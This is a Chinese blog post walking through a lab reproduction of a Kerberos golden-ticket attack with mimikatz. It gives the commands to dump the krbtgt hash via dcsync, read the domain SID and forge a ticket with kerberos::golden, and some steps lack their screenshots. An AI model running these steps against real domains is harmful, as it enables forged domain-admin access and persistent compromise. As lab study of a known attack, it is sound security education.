黄金票据的复现

最新推荐文章于 2024-06-14 14:14:39 发布
最新推荐文章于 2024-06-14 14:14:39 发布
阅读量460 收藏 9
点赞数 3
文章标签: jupyter
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Lemon_miko/article/details/137336196
版权

实验环境以及工具

服务器:Windows server 2003

用户:Windows 7旗舰版

工具:mimikatz

搭建服务器环境

参考:内网横向——域渗透之黄金票据复现-CSDN博客

创建用户

使用gpupdate刷新策略;

搭建win7环境

设置ip

 

 

 

 

 

 

 

 

 

 黄金票攻击复现

 这里直接在域控制权上进行操作
whoami /user    获取域的sid值(去掉最后的-500,500表示为administrator用户)
net config workstation  查看所处域

 

 

获取域的KRBTGT账户NTLM密码哈希或者aes-256值

用mimikatz

lsadump::dcsync /domain:aabb.com /user:krbtgt /csv

 

客户端打开mimikatz,首先清除之前的票据,依次输入指令

kerberos::purge

kerberos::list

dir \\aabb-bca237.aabb.com\c$


进行黄金票据的制作。指令格式为:

kerberos::golden /user:普通域用户 /domain:域 /sid:域的SID /krbtgt:krbtgt的NTLM_Hash /ticket:名字.kirbi

则生成黄金票据的指令为:

kerberos:golden /user:zhaoerhe /domain:ytdd.com /sid:S-1-5-21-1206714925-2034148990-4264453829 /krbtgt: /ticket:aabb.kirbi

参考:

3. mimikatz

kerberos::golden

mimikatz的kerberos::golden模块可以用于制作黄金票据,票据格式是.kirbi

首先获取krbtgt的hash

image-20191012175213102

获取域的sid

image-20191104153401060

制作黄金票据

吃完早餐说晚安
关注
  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
黄金票据维持域控权限
weixin_49196285的博客
12-07 908
黄金票据维持域控权限 实验环境:windows2012域控、windows2012域内主机 实验要求:利用黄金票据维持域控权限 详细步骤: 1.首先搭建相关的域环境 a:设置服务器 b:更改计算机名称 C.安装域控制器和DNS服务 设置完成以后的安装页面如下: d:之后升级服务器并且添加相关的域名,配置完成以后可以在如下页面看到: e:之后把WIN7添加到域控之中,成为域控成员。最后添加用户成功并且最后发域控搭建成功,登录页面如下: 2.
Kerberos协议分析及域服务器配置以及黄金白银票据攻击
nopants的博客
06-16 962
域服务器搭建以及用户加入域服务器及黄金白银票据攻击的验证
黄金票据
cxy020的博客
04-03 715
通常这将是根域Enterprise Admins组的“S-1-5-21-1473643419-774954089-5872329127-519”值。/ groups(可选)---用户所属的组RID(第一组是主组)。/ sid ----域的SID,在这个例子中:“S-1-5-21-1473643419-774954089-2222329127”使用黄金票据可以在没有AS-REQ或AS-REP(Kerberos认证的前两步)通信的情况下,向域控制器请求服务票据。/ id(可选) - 用户RID。
内网横向——域渗透之黄金票据
ytdd66的博客
04-03 1132
Kerberos是一种由MIT(麻省理工大学)提出的一种网络身份验证协议。它旨在通过使用密钥加密技术为客户端/服务器应用程序提供强身份验证。其中KDC服务默认会安装在一个域的域控中,而Client和Server为域内的用户或者是服务,如HTTP服务,SQL服务。在Kerberos中Client是否有权限访问Server端的服务由KDC发放的票据来决定。
黄金票据
moyuan_4s的博客
04-03 382
具体来说,当用户进行身份验证时,KDC 会发出一个票据授予票据(TGT),其中包括一个唯一的会话密钥和一个时间戳,该时间戳指定该会话的有效时间(通常为8或10小时)。当攻击者获取到域内 krbtgt 帐户的 SID 和 HASH,就可以随意伪造域内管理员用户,再加上域帐户 krbtgt 的密码基本不会更改,即使域管修改了密码,攻击者依然可以通过黄金票据获取域管理员权限。在域环境中,黄金票据是一种特别危险的攻击,是域控权限失陷的特征。1. 信息收集:获取目标域的相关信息,如域名、域控制器的 IP 地址等。
域内横向渗透-PTT票据传递之黄金票据 (Golden Ticket)
m0_62783065的博客
09-22 498
PTT票据传递之黄金票据 (Golden Ticket),介绍黄金票据的原理及其使用方法
后渗透——域权限维持之利用黄金票据与白银票据获取域控权限
爱国小白帽
04-03 5739
声明:本文介绍的技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可传播使用相关技术及工具从事违法犯罪行为,一经发直接上报国家安全机关处理 权限维持 黄金票据 ms14068的漏洞原理是伪造域管的tgt,而黄金票据的漏洞原理是伪造krbtgt用户的票据,krbtgt用户是域控中用来管理发放票据的用户,拥有了该用户的权限,就可以伪造系统中的任意用户 黄金票据的条件要求: 1.域名称...
内网渗透-(黄金票据和白银票据)详解(一)
duoba_an的博客
03-31 1148
在 Kerberos 认证中,最主要的问题是如何证明「你是你」的问题,如当一个 Client 去访问 Server 服务器上的某服务时,Server 如何判断 Client 是否有权限来访问自己主机上的服务,同时保证在这个过程中的通讯内容即使被拦截或篡改也不影响通讯的安全性,这正是 Kerberos 解决的问题。获取Client的sid,以及所在的组,再根据该服务的ACL,判断Client是否有访问服务的权限,到此完成整个认证流程(大多数服务并没有验证PAC这一步)。这个是启用PAC支持的扩展。
黄金白银票据伪造
gental_z的博客
01-04 2451
黄金白银票据伪造 域内协议Kerberos ​ 在域环境中,一般使用Kerberos来作为身份认证的一种协议。其实NTLM协议也存在于域环境中。两种协议共存,针对不同的协议,也就有了不同的攻击方式。 传统的Kerberos认证模型 ​ 首先来介绍一下Kerberos认证的模型: ​ 在Kerberos认证环境下,主要存在三种角色,分别为客户端、服务端以及KDC即密钥分发中心。在域环境中,KDC存在于DC上面。客户端想要访问服务端上的某些服务,首先需要向KDC申请一张TGT票据,然后使用此票据去申请访问目标
票据培训20220120
01-20
票据培训20220120 票据培训是金融行业中的一门重要课程,旨在帮助学习者了解票据业务的基本概念、流程和操作。下面是票据培训的相关知识点: 1. 票据业务简介 票据业务是指银行或其他金融机构发放票据,以满足...
恒生票据综合管理系统解决方案
03-14
该解决方案涵盖了票据的整个生命周期管理,包括电子票据、实物票据票据池、票据理财、票据资管等模块。 业务解决方案: 恒生票据综合管理系统解决方案提供了多种业务解决方案,包括: * 票据业务解决方案:提供...
C#票据打印系统
12-29
C#票据打印系统 可自定义设置模版 图形化编辑,小票打印,标签打印等等
通用票据打印
08-08
用友通用票据打印
银行托收票据流程.gif
11-01
银行托收票据流程
python-jupyter notebook安装教程
最新发布
Zwq的博客
06-14 672
python-jupyter notebook安装教程,数据分析利器!
【Python入门与进阶】Jupyter Notebook配置与优化
小火龙的博客
06-08 455
Jupyter Notebook 是一款广受数据分析、机器学习从业者欢迎的交互式Web应用程序。它支持多种编程语言,提供实时代码编写、执行和结果展示的便捷界面,并能嵌入丰富的多媒体内容。 本篇博客详细介绍了 Jupyter Notebook 的安装和使用方法。首先介绍了两种安装方式:通过命令行使用 pip 安装,以及利用 Anaconda 可视化界面安装。对于命令行安装,需要确保 Python 和 pip 环境就绪,然后运行安装命令即可;对于 Anaconda 安装,只需在 Anaconda Naviga
vscode中jupyter notebook执行bash命令,乱码解决方法
逐月
06-08 518
可以看到默认的cmd code page, 发是936. 参考:https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/chcp。默认vscode会选择使用cmd执行shell, 但是通过vscode的设置修改好像只能影响到vscode的termial. 另外vscode设置项中的编码已经是utf-8了。但是使用vscode的terminal执行同样的命令又没有问题,系统自带的cmd也没有问题。
Jupyter Notebook 入门教程
No_Name_Cao_Ni_Mei的博客
06-14 233
Jupyter Notebook 是一个功能强大的工具,特别适合数据科学、机器学习等领域的代码开发和文档编写。通过本教程,你应该能够开始使用 Jupyter Notebook,并探索其丰富的功能。不断实践和尝试,你将发 Jupyter Notebook 为你的编程旅程带来的便利和乐趣。
内网中黄金票据和白银票据的区别
05-14
在内网中,黄金票据和白银票据通常是指两种不同的身份验证方式。 黄金票据是指一个用于身份验证的加密令牌,它被称为黄金是因为它具有最高的权限级别。黄金票据可以让用户在网络中获得管理员级别的访问权限,因此它的使用应该被高度限制并受到严格的监管。 白银票据则是一个用于身份验证的较低级别的加密令牌。它通常被用于授权用户在网络中执行一些普通的任务,例如打印文件或者访问共享文件夹。白银票据通常具有比黄金票据更低的访问权限,因此它的使用范围更广,可以被更多的用户所使用。 总的来说,黄金票据和白银票据都是用于身份验证的加密令牌,它们的主要区别在于权限级别的高低。在内网中,这些票据的使用应该受到高度的限制和监管,以确保网络的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值